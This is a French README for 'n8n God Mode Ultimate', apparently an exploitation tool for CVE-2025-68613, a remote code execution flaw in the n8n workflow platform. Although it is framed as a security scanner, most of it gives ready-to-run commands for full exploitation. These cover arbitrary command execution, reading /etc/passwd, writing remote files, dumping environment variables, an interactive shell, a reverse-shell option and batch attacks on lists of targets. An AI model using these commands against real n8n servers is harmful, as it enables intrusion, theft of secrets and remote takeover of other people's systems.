n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ Exécution de code à distance dans l'automatisation de workflows
n8n God Mode Ultimate est un framework complet de tests de sécurité conçu pour détecter et valider CVE-2025-68613 sur les plateformes d'automatisation de workflows n8n. Cette vulnérabilité critique d'exécution de code à distance (RCE) affecte les versions de n8n via une injection d'expression dans les contextes d'exécution des workflows.
Versions concernées :
Versions corrigées :
--detect - Détection de version uniquement (le plus rapide, non intrusif)--safe - Vérification sécurisée de la vulnérabilité sans exploitation--poc - Validation de preuve de concept RCE--exploit - Mode exploitation complèteread <fichier> - Lire des fichiers distantswrite <fichier> <contenu> - Écrire des fichiers sur la cible# Python 3.8 ou supérieur
python3 --version
# Gestionnaire de paquets pip
pip3 --version
# Cloner le dépôt
git clone https://github.com/hackersatyamrastogi/n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate.git
cd n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate
# Installer les paquets requis
pip3 install -r requirements.txt
requests>=2.31.0
urllib3>=2.0.0
tqdm>=4.66.0
colorama>=0.4.6
# Afficher le menu d'aide
python3 n8n-godmode-ultimate.py -h
# Détecter la version de n8n (non intrusif)
python3 n8n-godmode-ultimate.py -u http://cible:5678 --detect
# Vérification sécurisée de la vulnérabilité
python3 n8n-godmode-ultimate.py -u http://cible:5678 --safe -e [email protected] -p motdepasse
# Preuve de concept RCE
python3 n8n-godmode-ultimate.py -u http://cible:5678 --poc -e [email protected] -p motdepasse
# Exploitation complète
python3 n8n-godmode-ultimate.py -u http://cible:5678 --exploit -e [email protected] -p motdepasse
# Exécuter une seule commande
python3 n8n-godmode-ultimate.py --god -u http://cible:5678 \
-e [email protected] -p motdepasse --cmd "whoami"
# Lire un fichier distant
python3 n8n-godmode-ultimate.py --god -u http://cible:5678 \
-e [email protected] -p motdepasse --read-file "/etc/passwd"
# Écrire un fichier distant
python3 n8n-godmode-ultimate.py --god -u http://cible:5678 \
-e [email protected] -p motdepasse --write-file "/tmp/test.txt" --content "payload"
# Extraire les variables d'environnement
python3 n8n-godmode-ultimate.py --god -u http://cible:5678 \
-e [email protected] -p motdepasse --dump-env
# Shell interactif
python3 n8n-godmode-ultimate.py --god -u http://cible:5678 \
-e [email protected] -p motdepasse --shell
# Scanner plusieurs cibles depuis un fichier
python3 n8n-godmode-ultimate.py -l cibles.txt --detect -t 20
# Exploitation par lots
python3 n8n-godmode-ultimate.py -l cibles.txt --poc -e [email protected] -p motdepasse -t 10
Format de cibles.txt :
http://cible1:5678
https://cible2.example.com
http://192.168.1.100:5678
https://n8n.example.org
Une fois en mode shell (--shell) :
n8n> whoami # Exécuter une commande
n8n> read /etc/passwd # Lire un fichier
n8n> env # Afficher les variables d'environnement
n8n> info # Informations système
n8n> history # Historique des commandes
n8n> exit # Quitter le shell
-u, --url URL URL cible n8n
-l, --list FILE Fichier contenant les URL cibles
-t, --threads NUM Nombre de threads pour le scan par lots (défaut : 10)
-e, --email EMAIL Email utilisateur n8n
-p, --password PASS Mot de passe utilisateur n8n
--detect Détection de version uniquement (le plus rapide)
--safe Vérification sécurisée sans exploitation
--poc Preuve de concept RCE
--exploit Mode exploitation complète
--god Activer le god mode
--cmd COMMAND Exécuter une seule commande
--read-file PATH Lire un fichier distant
--write-file PATH Écrire un fichier distant
--content DATA Contenu pour l'opération d'écriture
--dump-env Extraire toutes les variables d'environnement
--shell Mode shell interactif
--revshell HOST:PORT Payload reverse shell
--mode MODE Mode d'exploitation : schedule|webhook|code|expression (défaut : schedule)
--timeout SEC Délai d'attente de commande en secondes (défaut : 30)
--cleanup Supprimer les workflows après exécution
-k, --insecure Désactiver la vérification SSL
-v, --verbose Sortie détaillée
-q, --quiet Sortie minimale
Crée un workflow avec un déclencheur planifié qui s'exécute automatiquement toutes les 3 secondes. Méthode la plus fiable.